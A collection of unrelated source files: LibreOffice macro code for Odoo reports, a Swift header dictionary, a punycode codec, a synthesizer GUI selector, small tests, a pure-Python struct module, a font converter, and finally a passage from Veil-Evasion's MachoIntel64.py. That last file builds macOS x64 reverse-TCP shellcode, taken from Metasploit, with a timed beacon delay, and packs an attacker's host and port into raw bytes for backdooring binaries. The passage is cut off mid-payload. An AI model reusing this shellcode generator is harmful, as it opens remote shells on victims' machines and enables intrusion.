if aComponentAdd.__contains__(oPar.Name)==False:
aComponentAdd.append(oPar.Name)
else:
if aComponentAdd.__contains__(sTableName+"."+oPar.Name)==False:
aComponentAdd.append(sTableName+"."+oPar.Name)
return 0
def getRecersiveSection(oCurrentSection, aSectionList):
desktop=getDesktop()
doc =desktop.getCurrentComponent()
oParEnum=doc.getText().createEnumeration()
aSectionList.append(oCurrentSection.Name)
if oCurrentSection.ParentSection:
getRecersiveSection(oCurrentSection.ParentSection,aSectionList)
else:
return
def GetAFileName():
oFileDialog=None
iAccept=None
sPath=""
InitPath=""
oUcb=None
oFileDialog = createUnoService("com.sun.star.ui.dialogs.FilePicker")
oUcb = createUnoService("com.sun.star.ucb.SimpleFileAccess")
oFileDialog.appendFilter("Odoo Report File","*.sxw")
oFileDialog.setCurrentFilter("Odoo Report File")
if InitPath == "":
InitPath =tempfile.gettempdir()
#End If
if oUcb.exists(InitPath):
oFileDialog.setDisplayDirectory(InitPath)
#End If
iAccept = oFileDialog.execute()
if iAccept == 1:
sPath = oFileDialog.Files[0]
oFileDialog.dispose()
return sPath
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
bratsche/Neutron-Drive
|
refs/heads/master
|
google_appengine/lib/django_1_3/django/contrib/sitemaps/models.py
|
914
|
# This file intentionally left blank
|
williamthegrey/swift
|
refs/heads/master
|
swift/common/header_key_dict.py
|
5
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
class HeaderKeyDict(dict):
"""
A dict that title-cases all keys on the way in, so as to be
case-insensitive.
"""
def __init__(self, base_headers=None, **kwargs):
if base_headers:
self.update(base_headers)
self.update(kwargs)
def update(self, other):
if hasattr(other, 'keys'):
for key in other.keys():
self[key.title()] = other[key]
else:
for key, value in other:
self[key.title()] = value
def __getitem__(self, key):
return dict.get(self, key.title())
def __setitem__(self, key, value):
if value is None:
self.pop(key.title(), None)
elif isinstance(value, six.text_type):
return dict.__setitem__(self, key.title(), value.encode('utf-8'))
else:
return dict.__setitem__(self, key.title(), str(value))
def __contains__(self, key):
return dict.__contains__(self, key.title())
def __delitem__(self, key):
return dict.__delitem__(self, key.title())
def get(self, key, default=None):
return dict.get(self, key.title(), default)
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def pop(self, key, default=None):
return dict.pop(self, key.title(), default)
|
nekulin/arangodb
|
refs/heads/devel
|
3rdParty/V8-4.3.61/third_party/python_26/Lib/encodings/punycode.py
|
586
|
# -*- coding: iso-8859-1 -*-
""" Codec for the Punicode encoding, as specified in RFC 3492
Written by Martin v. Löwis.
"""
import codecs
##################### Encoding #####################################
def segregate(str):
"""3.1 Basic code point segregation"""
base = []
extended = {}
for c in str:
if ord(c) < 128:
base.append(c)
else:
extended[c] = 1
extended = extended.keys()
extended.sort()
return "".join(base).encode("ascii"),extended
def selective_len(str, max):
"""Return the length of str, considering only characters below max."""
res = 0
for c in str:
if ord(c) < max:
res += 1
return res
def selective_find(str, char, index, pos):
"""Return a pair (index, pos), indicating the next occurrence of
char in str. index is the position of the character considering
only ordinals up to and including char, and pos is the position in
the full string. index/pos is the starting position in the full
string."""
l = len(str)
while 1:
pos += 1
if pos == l:
return (-1, -1)
c = str[pos]
if c == char:
return index+1, pos
elif c < char:
index += 1
def insertion_unsort(str, extended):
"""3.2 Insertion unsort coding"""
oldchar = 0x80
result = []
oldindex = -1
for c in extended:
index = pos = -1
char = ord(c)
curlen = selective_len(str, char)
delta = (curlen+1) * (char - oldchar)
while 1:
index,pos = selective_find(str,c,index,pos)
if index == -1:
break
delta += index - oldindex
result.append(delta-1)
oldindex = index
delta = 0
oldchar = char
return result
def T(j, bias):
# Punycode parameters: tmin = 1, tmax = 26, base = 36
res = 36 * (j + 1) - bias
if res < 1: return 1
if res > 26: return 26
return res
digits = "abcdefghijklmnopqrstuvwxyz0123456789"
def generate_generalized_integer(N, bias):
"""3.3 Generalized variable-length integers"""
result = []
j = 0
while 1:
t = T(j, bias)
if N < t:
result.append(digits[N])
return result
result.append(digits[t + ((N - t) % (36 - t))])
N = (N - t) // (36 - t)
j += 1
def adapt(delta, first, numchars):
if first:
delta //= 700
else:
delta //= 2
delta += delta // numchars
# ((base - tmin) * tmax) // 2 == 455
divisions = 0
while delta > 455:
delta = delta // 35 # base - tmin
divisions += 36
bias = divisions + (36 * delta // (delta + 38))
return bias
def generate_integers(baselen, deltas):
"""3.4 Bias adaptation"""
# Punycode parameters: initial bias = 72, damp = 700, skew = 38
result = []
bias = 72
for points, delta in enumerate(deltas):
s = generate_generalized_integer(delta, bias)
result.extend(s)
bias = adapt(delta, points==0, baselen+points+1)
return "".join(result)
def punycode_encode(text):
base, extended = segregate(text)
base = base.encode("ascii")
deltas = insertion_unsort(text, extended)
extended = generate_integers(len(base), deltas)
if base:
return base + "-" + extended
return extended
##################### Decoding #####################################
def decode_generalized_number(extended, extpos, bias, errors):
"""3.3 Generalized variable-length integers"""
result = 0
w = 1
j = 0
while 1:
try:
char = ord(extended[extpos])
except IndexError:
if errors == "strict":
raise UnicodeError, "incomplete punicode string"
return extpos + 1, None
extpos += 1
if 0x41 <= char <= 0x5A: # A-Z
digit = char - 0x41
elif 0x30 <= char <= 0x39:
digit = char - 22 # 0x30-26
elif errors == "strict":
raise UnicodeError("Invalid extended code point '%s'"
% extended[extpos])
else:
return extpos, None
t = T(j, bias)
result += digit * w
if digit < t:
return extpos, result
w = w * (36 - t)
j += 1
def insertion_sort(base, extended, errors):
"""3.2 Insertion unsort coding"""
char = 0x80
pos = -1
bias = 72
extpos = 0
while extpos < len(extended):
newpos, delta = decode_generalized_number(extended, extpos,
bias, errors)
if delta is None:
# There was an error in decoding. We can't continue because
# synchronization is lost.
return base
pos += delta+1
char += pos // (len(base) + 1)
if char > 0x10FFFF:
if errors == "strict":
raise UnicodeError, ("Invalid character U+%x" % char)
char = ord('?')
pos = pos % (len(base) + 1)
base = base[:pos] + unichr(char) + base[pos:]
bias = adapt(delta, (extpos == 0), len(base))
extpos = newpos
return base
def punycode_decode(text, errors):
pos = text.rfind("-")
if pos == -1:
base = ""
extended = text
else:
base = text[:pos]
extended = text[pos+1:]
base = unicode(base, "ascii", errors)
extended = extended.upper()
return insertion_sort(base, extended, errors)
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
res = punycode_encode(input)
return res, len(input)
def decode(self,input,errors='strict'):
if errors not in ('strict', 'replace', 'ignore'):
raise UnicodeError, "Unsupported error handling "+errors
res = punycode_decode(input, errors)
return res, len(input)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return punycode_encode(input)
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
if self.errors not in ('strict', 'replace', 'ignore'):
raise UnicodeError, "Unsupported error handling "+self.errors
return punycode_decode(input, self.errors)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='punycode',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
|
zynthian/zynthian-ui
|
refs/heads/master
|
zyngui/zynthian_gui_audio_out.py
|
1
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#******************************************************************************
# ZYNTHIAN PROJECT: Zynthian GUI
#
# Zynthian GUI Audio-Out Selector Class
#
# Copyright (C) 2015-2018 Fernando Moyano <jofemodo@zynthian.org>
#
#******************************************************************************
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the LICENSE.txt file.
#
#******************************************************************************
import sys
import tkinter
import logging
# Zynthian specific modules
import zynautoconnect
from . import zynthian_gui_config
from . import zynthian_gui_selector
#------------------------------------------------------------------------------
# Zynthian Audio-Out Selection GUI Class
#------------------------------------------------------------------------------
class zynthian_gui_audio_out(zynthian_gui_selector):
def __init__(self):
self.layer=None
self.end_layer = None
super().__init__('Audio Out', True)
def set_layer(self, layer):
self.layer = layer
try:
self.end_layer = self.zyngui.screens['layer'].get_fxchain_ends(self.layer)[0]
except:
self.end_layer = None
def fill_list(self):
self.list_data = []
for k in zynautoconnect.get_audio_input_ports().keys():
try:
title = self.zyngui.screens['layer'].get_layer_by_jackname(k).get_basepath()
except:
title = k
try:
ch = int(title.split('#')[0])-1
if ch==self.layer.midi_chan:
continue
except Exception as e:
#logging.debug("Can't get layer's midi chan => {}".format(e))
pass
if self.end_layer and k in self.end_layer.get_audio_out():
self.list_data.append((k, k, "[x] " + title))
else:
self.list_data.append((k, k, "[ ] " + title))
super().fill_list()
def fill_listbox(self):
super().fill_listbox()
def select_action(self, i, t='S'):
self.end_layer.toggle_audio_out(self.list_data[i][1])
self.fill_list()
def back_action(self):
self.zyngui.show_modal('layer_options')
return ''
def set_select_path(self):
self.select_path.set("Send Audio to ...")
#------------------------------------------------------------------------------
|
micropython/micropython
|
refs/heads/master
|
tests/float/string_format_modulo2.py
|
15
|
# test formatting floats with large precision, that it doesn't overflow the buffer
def test(num, num_str):
if num == float("inf") or num == 0.0 and num_str != "0.0":
# skip numbers that overflow or underflow the FP precision
return
for kind in ("e", "f", "g"):
# check precision either side of the size of the buffer (32 bytes)
for prec in range(23, 36, 2):
fmt = "%." + "%d" % prec + kind
s = fmt % num
check = abs(float(s) - num)
if num > 1:
check /= num
if check > 1e-6:
print("FAIL", num_str, fmt, s, len(s), check)
# check pure zero
test(0.0, "0.0")
# check some powers of 10, making sure to include exponents with 3 digits
for e in range(-8, 8):
num = pow(10, e)
test(num, "1e%d" % e)
|
enacuavlab/pprzros
|
refs/heads/master
|
pprzros/setup.py
|
1
|
## ! DO NOT MANUALLY INVOKE THIS setup.py, USE CATKIN INSTEAD
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
# fetch values from package.xml
setup_args = generate_distutils_setup(
packages=['pprzros'],
package_dir={'': 'src'})
setup(**setup_args)
|
infoxchange/lettuce
|
refs/heads/master
|
tests/integration/lib/Django-1.3/tests/regressiontests/handlers/tests.py
|
29
|
from django.utils import unittest
from django.conf import settings
from django.core.handlers.wsgi import WSGIHandler
class HandlerTests(unittest.TestCase):
def test_lock_safety(self):
"""
Tests for bug #11193 (errors inside middleware shouldn't leave
the initLock locked).
"""
# Mangle settings so the handler will fail
old_middleware_classes = settings.MIDDLEWARE_CLASSES
settings.MIDDLEWARE_CLASSES = 42
# Try running the handler, it will fail in load_middleware
handler = WSGIHandler()
self.assertEqual(handler.initLock.locked(), False)
try:
handler(None, None)
except:
pass
self.assertEqual(handler.initLock.locked(), False)
# Reset settings
settings.MIDDLEWARE_CLASSES = old_middleware_classes
|
django-nonrel/django-nonrel
|
refs/heads/develop
|
django/db/backends/mysql/validation.py
|
392
|
from django.db.backends import BaseDatabaseValidation
class DatabaseValidation(BaseDatabaseValidation):
def validate_field(self, errors, opts, f):
"""
There are some field length restrictions for MySQL:
- Prior to version 5.0.3, character fields could not exceed 255
characters in length.
- No character (varchar) fields can have a length exceeding 255
characters if they have a unique index on them.
"""
from django.db import models
db_version = self.connection.get_server_version()
varchar_fields = (models.CharField, models.CommaSeparatedIntegerField,
models.SlugField)
if isinstance(f, varchar_fields) and f.max_length > 255:
if db_version < (5, 0, 3):
msg = '"%(name)s": %(cls)s cannot have a "max_length" greater than 255 when you are using a version of MySQL prior to 5.0.3 (you are using %(version)s).'
elif f.unique == True:
msg = '"%(name)s": %(cls)s cannot have a "max_length" greater than 255 when using "unique=True".'
else:
msg = None
if msg:
errors.add(opts, msg % {'name': f.name, 'cls': f.__class__.__name__, 'version': '.'.join([str(n) for n in db_version[:3]])})
|
decause/pyglet-remy
|
refs/heads/master
|
tests/graphics/IMMEDIATE_INDEXED.py
|
18
|
#!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import unittest
import pyglet
from graphics_common import *
__noninteractive = True
class TEST_CASE(unittest.TestCase):
def check(self, expected, result, dimensions):
if len(expected) != len(result) * dimensions / 4:
self.fail('Incorrect number of vertices in feedback array')
for d in range(2):
for e, r in zip(expected[d::dimensions], result[d::4]):
if abs(e - r) > 0.01:
self.fail('Feedback array is in error: %r, %r' % \
(e, r))
def generic_test(self, v_fmt, v_data,
c_fmt=None, c_data=None,
t_fmt=None, t_data=None):
data = [(v_fmt, v_data)]
n_v = int(v_fmt[1])
if c_fmt:
data.append((c_fmt, c_data))
n_c = int(c_fmt[1])
if t_fmt:
data.append((t_fmt, t_data))
n_t = int(t_fmt[1])
vertices, colors, tex_coords = get_feedback(lambda: \
pyglet.graphics.draw_indexed(n_vertices, GL_TRIANGLES, index_data,
*data))
self.check(get_ordered_data(v_data, n_v), vertices, n_v)
if c_fmt:
self.check(get_ordered_data(c_data, n_c), colors, n_c)
if t_fmt:
self.check(get_ordered_data(t_data, n_t), tex_coords, n_t)
def test_v2f(self):
self.generic_test('v2f', v2f_data)
def test_v3f(self):
self.generic_test('v3f', v3f_data)
def test_v2f_c3f(self):
self.generic_test('v2f', v2f_data, 'c3f', c3f_data)
def test_v2f_c4f(self):
self.generic_test('v2f', v2f_data, 'c4f', c4f_data)
def test_v3f_c3f(self):
self.generic_test('v3f', v3f_data, 'c3f', c3f_data)
def test_v3f_c4f(self):
self.generic_test('v3f', v3f_data, 'c4f', c4f_data)
def test_v2f_t2f(self):
self.generic_test('v2f', v2f_data, None, None, 't2f', t2f_data)
def test_v3f_c3f_t2f(self):
self.generic_test('v3f', v3f_data, 'c3f', c3f_data, 't2f', t2f_data)
def test_v3f_c3f_t3f(self):
self.generic_test('v3f', v3f_data, 'c3f', c3f_data, 't3f', t3f_data)
def test_v3f_c4f_t4f(self):
self.generic_test('v3f', v3f_data, 'c4f', c4f_data, 't4f', t4f_data)
if __name__ == '__main__':
unittest.main()
|
bis12/yapwaf
|
refs/heads/master
|
examples/hello/app/models/user.py
|
2
|
import yapwaf as Y
from sqlalchemy import Column, Integer, String
class User(Y.Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
first_name = Column(String)
last_name = Column(String)
def __init__(self, first, last):
self.first_name = first
self.last_name = last
|
trotterdylan/grumpy
|
refs/heads/master
|
third_party/pypy/_struct.py
|
7
|
#
# This module is a pure Python version of pypy.module.struct.
# It is only imported if the vastly faster pypy.module.struct is not
# compiled in. For now we keep this version for reference and
# because pypy.module.struct is not ootype-backend-friendly yet.
#
"""Functions to convert between Python values and C structs.
Python strings are used to hold the data representing the C struct
and also as format strings to describe the layout of data in the C struct.
The optional first format char indicates byte order, size and alignment:
@: native order, size & alignment (default)
=: native order, std. size & alignment
<: little-endian, std. size & alignment
>: big-endian, std. size & alignment
!: same as >
The remaining chars indicate types of args and must match exactly;
these can be preceded by a decimal repeat count:
x: pad byte (no data);
c:char;
b:signed byte;
B:unsigned byte;
h:short;
H:unsigned short;
i:int;
I:unsigned int;
l:long;
L:unsigned long;
f:float;
d:double.
Special cases (preceding decimal count indicates length):
s:string (array of char); p: pascal string (with count byte).
Special case (only available in native format):
P:an integer type that is wide enough to hold a pointer.
Special case (not in native mode unless 'long long' in platform C):
q:long long;
Q:unsigned long long
Whitespace between formats is ignored.
The variable struct.error is an exception raised on errors."""
import math
import sys
# TODO: XXX Find a way to get information on native sizes and alignments
class StructError(Exception):
pass
error = StructError
bytes = str
def unpack_int(data, index, size, le):
_bytes = [b for b in data[index:index + size]]
if le == 'little':
_bytes.reverse()
number = 0
for b in _bytes:
number = number << 8 | b
return int(number)
def unpack_signed_int(data, index, size, le):
number = unpack_int(data, index, size, le)
max = (1 << (size * 8))
if number > (1 << (size * 8 - 1)) - 1:
number = int(-1 * (max - number))
return number
INFINITY = 1e200 * 1e200
NAN = INFINITY / INFINITY
def unpack_char(data, index, size, le):
return data[index:index + size]
def pack_int(number, size, le):
x = number
res = []
for i in range(size):
res.append(x & 0xff)
x = x >> 8
if le == 'big':
res.reverse()
return ''.join(chr(x) for x in res)
def pack_signed_int(number, size, le):
if not isinstance(number, int):
raise StructError("argument for i,I,l,L,q,Q,h,H must be integer")
if number > (1 << (8 * size - 1)) - 1 or number < -1 * (1 << (8 * size - 1)):
raise OverflowError("Number:%i too large to convert" % number)
return pack_int(number, size, le)
def pack_unsigned_int(number, size, le):
if not isinstance(number, int):
raise StructError("argument for i,I,l,L,q,Q,h,H must be integer")
if number < 0:
raise TypeError("can't convert negative long to unsigned")
if number > (1 << (8 * size)) - 1:
raise OverflowError("Number:%i too large to convert" % number)
return pack_int(number, size, le)
def pack_char(char, size, le):
return str(char)
def isinf(x):
return x != 0.0 and x / 2 == x
def isnan(v):
return v != v * 1.0 or (v == 1.0 and v == 2.0)
def pack_float(x, size, le):
unsigned = float_pack(x, size)
result = []
for i in range(8):
result.append((unsigned >> (i * 8)) & 0xFF)
if le == "big":
result.reverse()
return ''.join(chr(x) for x in result)
def unpack_float(data, index, size, le):
binary = [data[i] for i in range(index, index + 8)]
if le == "big":
binary.reverse()
unsigned = 0
for i in range(8):
# unsigned |= binary[i] << (i * 8)
unsigned |= ord(binary[i]) << (i * 8)
return float_unpack(unsigned, size, le)
def round_to_nearest(x):
"""Python 3 style round: round a float x to the nearest int, but
unlike the builtin Python 2.x round function:
- return an int, not a float
- do round-half-to-even, not round-half-away-from-zero.
We assume that x is finite and nonnegative; except wrong results
if you use this for negative x.
"""
int_part = int(x)
frac_part = x - int_part
if frac_part > 0.5 or frac_part == 0.5 and int_part & 1 == 1:
int_part += 1
return int_part
def float_unpack(Q, size, le):
"""Convert a 32-bit or 64-bit integer created
by float_pack into a Python float."""
if size == 8:
MIN_EXP = -1021 # = sys.float_info.min_exp
MAX_EXP = 1024 # = sys.float_info.max_exp
MANT_DIG = 53 # = sys.float_info.mant_dig
BITS = 64
elif size == 4:
MIN_EXP = -125 # C's FLT_MIN_EXP
MAX_EXP = 128 # FLT_MAX_EXP
MANT_DIG = 24 # FLT_MANT_DIG
BITS = 32
else:
raise ValueError("invalid size value")
if Q >> BITS:
raise ValueError("input out of range")
# extract pieces
sign = Q >> BITS - 1
exp = (Q & ((1 << BITS - 1) - (1 << MANT_DIG - 1))) >> MANT_DIG - 1
mant = Q & ((1 << MANT_DIG - 1) - 1)
if exp == MAX_EXP - MIN_EXP + 2:
# nan or infinity
result = float('nan') if mant else float('inf')
elif exp == 0:
# subnormal or zero
result = math.ldexp(float(mant), MIN_EXP - MANT_DIG)
else:
# normal
mant += 1 << MANT_DIG - 1
result = math.ldexp(float(mant), exp + MIN_EXP - MANT_DIG - 1)
return -result if sign else result
def float_pack(x, size):
"""Convert a Python float x into a 64-bit unsigned integer
with the same byte representation."""
if size == 8:
MIN_EXP = -1021 # = sys.float_info.min_exp
MAX_EXP = 1024 # = sys.float_info.max_exp
MANT_DIG = 53 # = sys.float_info.mant_dig
BITS = 64
elif size == 4:
MIN_EXP = -125 # C's FLT_MIN_EXP
MAX_EXP = 128 # FLT_MAX_EXP
MANT_DIG = 24 # FLT_MANT_DIG
BITS = 32
else:
raise ValueError("invalid size value")
sign = math.copysign(1.0, x) < 0.0
if math.isinf(x):
mant = 0
exp = MAX_EXP - MIN_EXP + 2
elif math.isnan(x):
mant = 1 << (MANT_DIG - 2) # other values possible
exp = MAX_EXP - MIN_EXP + 2
elif x == 0.0:
mant = 0
exp = 0
else:
m, e = math.frexp(abs(x)) # abs(x) == m * 2**e
exp = e - (MIN_EXP - 1)
if exp > 0:
# Normal case.
mant = round_to_nearest(m * (1 << MANT_DIG))
mant -= 1 << MANT_DIG - 1
else:
# Subnormal case.
if exp + MANT_DIG - 1 >= 0:
mant = round_to_nearest(m * (1 << exp + MANT_DIG - 1))
else:
mant = 0
exp = 0
# Special case: rounding produced a MANT_DIG-bit mantissa.
assert 0 <= mant <= 1 << MANT_DIG - 1
if mant == 1 << MANT_DIG - 1:
mant = 0
exp += 1
# Raise on overflow (in some circumstances, may want to return
# infinity instead).
if exp >= MAX_EXP - MIN_EXP + 2:
raise OverflowError("float too large to pack in this format")
# check constraints
assert 0 <= mant < 1 << MANT_DIG - 1
assert 0 <= exp <= MAX_EXP - MIN_EXP + 2
assert 0 <= sign <= 1
return ((sign << BITS - 1) | (exp << MANT_DIG - 1)) | mant
big_endian_format = {
'x': {'size': 1, 'alignment': 0, 'pack': None, 'unpack': None},
'b': {'size': 1, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'B': {'size': 1, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'c': {'size': 1, 'alignment': 0, 'pack': pack_char, 'unpack': unpack_char},
's': {'size': 1, 'alignment': 0, 'pack': None, 'unpack': None},
'p': {'size': 1, 'alignment': 0, 'pack': None, 'unpack': None},
'h': {'size': 2, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'H': {'size': 2, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'i': {'size': 4, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'I': {'size': 4, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'l': {'size': 4, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'L': {'size': 4, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'q': {'size': 8, 'alignment': 0, 'pack': pack_signed_int, 'unpack': unpack_signed_int},
'Q': {'size': 8, 'alignment': 0, 'pack': pack_unsigned_int, 'unpack': unpack_int},
'f': {'size': 4, 'alignment': 0, 'pack': pack_float, 'unpack': unpack_float},
'd': {'size': 8, 'alignment': 0, 'pack': pack_float, 'unpack': unpack_float},
}
default = big_endian_format
formatmode = {'<': (default, 'little'),
'>': (default, 'big'),
'!': (default, 'big'),
'=': (default, sys.byteorder),
'@': (default, sys.byteorder)
}
def getmode(fmt):
try:
formatdef, endianness = formatmode[fmt[0]]
index = 1
except (IndexError, KeyError):
formatdef, endianness = formatmode['@']
index = 0
return formatdef, endianness, index
def getNum(fmt, i):
num = None
cur = fmt[i]
while ('0' <= cur) and (cur <= '9'):
if num == None:
num = int(cur)
else:
num = 10 * num + int(cur)
i += 1
cur = fmt[i]
return num, i
def calcsize(fmt):
"""calcsize(fmt) -> int
Return size of C struct described by format string fmt.
See struct.__doc__ for more on format strings."""
formatdef, endianness, i = getmode(fmt)
num = 0
result = 0
while i < len(fmt):
num, i = getNum(fmt, i)
cur = fmt[i]
try:
format = formatdef[cur]
except KeyError:
raise StructError("%s is not a valid format" % cur)
if num != None:
result += num * format['size']
else:
result += format['size']
num = 0
i += 1
return result
def pack(fmt, *args):
"""pack(fmt, v1, v2, ...) -> string
Return string containing values v1, v2, ... packed according to fmt.
See struct.__doc__ for more on format strings."""
formatdef, endianness, i = getmode(fmt)
args = list(args)
n_args = len(args)
result = []
while i < len(fmt):
num, i = getNum(fmt, i)
cur = fmt[i]
try:
format = formatdef[cur]
except KeyError:
raise StructError("%s is not a valid format" % cur)
if num == None:
num_s = 0
num = 1
else:
num_s = num
if cur == 'x':
result += [b'\0' * num]
elif cur == 's':
if isinstance(args[0], bytes):
padding = num - len(args[0])
result += [args[0][:num] + b'\0' * padding]
args.pop(0)
else:
raise StructError("arg for string format not a string")
elif cur == 'p':
if isinstance(args[0], bytes):
padding = num - len(args[0]) - 1
if padding > 0:
result += [bytes([len(args[0])]) + args[0]
[:num - 1] + b'\0' * padding]
else:
if num < 255:
result += [bytes([num - 1]) + args[0][:num - 1]]
else:
result += [bytes([255]) + args[0][:num - 1]]
args.pop(0)
else:
raise StructError("arg for string format not a string")
else:
if len(args) < num:
raise StructError("insufficient arguments to pack")
for var in args[:num]:
result += [format['pack'](var, format['size'], endianness)]
args = args[num:]
num = None
i += 1
if len(args) != 0:
raise StructError("too many arguments for pack format")
return b''.join(result)
def unpack(fmt, data):
"""unpack(fmt, string) -> (v1, v2, ...)
Unpack the string, containing packed C structure data, according
to fmt. Requires len(string)==calcsize(fmt).
See struct.__doc__ for more on format strings."""
formatdef, endianness, i = getmode(fmt)
j = 0
num = 0
result = []
length = calcsize(fmt)
if length != len(data):
raise StructError("unpack str size does not match format")
while i < len(fmt):
num, i = getNum(fmt, i)
cur = fmt[i]
i += 1
try:
format = formatdef[cur]
except KeyError:
raise StructError("%s is not a valid format" % cur)
if not num:
num = 1
if cur == 'x':
j += num
elif cur == 's':
result.append(data[j:j + num])
j += num
elif cur == 'p':
n = data[j]
if n >= num:
n = num - 1
result.append(data[j + 1:j + n + 1])
j += num
else:
for n in range(num):
result += [format['unpack'](data, j, format['size'], endianness)]
j += format['size']
return tuple(result)
def pack_into(fmt, buf, offset, *args):
data = pack(fmt, *args)
buffer(buf)[offset:offset + len(data)] = data
def unpack_from(fmt, buf, offset=0):
size = calcsize(fmt)
data = buffer(buf)[offset:offset + size]
if len(data) != size:
raise error("unpack_from requires a buffer of at least %d bytes"
% (size,))
return unpack(fmt, data)
def _clearcache():
"Clear the internal cache."
# No cache in this implementation
|
phamelin/ardupilot
|
refs/heads/master
|
libraries/AP_OSD/fonts/mcm_all.py
|
21
|
#!/usr/bin/env python
def convert(in_file, out_file):
'''Compile mcm file to binary'''
with open(in_file) as inp:
content = inp.readlines()
inp.close()
content.pop(0)
out = open(out_file, 'wb')
i = -1
for line in content:
i = i + 1
if i % 64 < 54:
b = int(line, 2)
out.write(bytearray([b]))
out.close()
convert('clarity.mcm', 'font0.bin')
convert('clarity_medium.mcm', 'font1.bin')
convert('bfstyle.mcm', 'font2.bin')
convert('bold.mcm', 'font3.bin')
convert('digital.mcm', 'font4.bin')
|
mcardacci/tools_of_the_dark_arts
|
refs/heads/master
|
Veil-Evasion/tools/backdoor/intel/MachoIntel64.py
|
12
|
'''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import struct
class macho_intel64_shellcode():
"""
Mach-O Intel x64 shellcode Class
"""
def __init__(self, HOST, PORT, jumpLocation=0x0, SUPPLIED_SHELLCODE=None, BEACON=15):
self.HOST = HOST
self.PORT = PORT
self.jumpLocation = jumpLocation
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.BEACON = BEACON
self.shellcode = ""
def pack_ip_addresses(self):
hostocts = []
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def delay_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, 15 for seconds
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
)
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
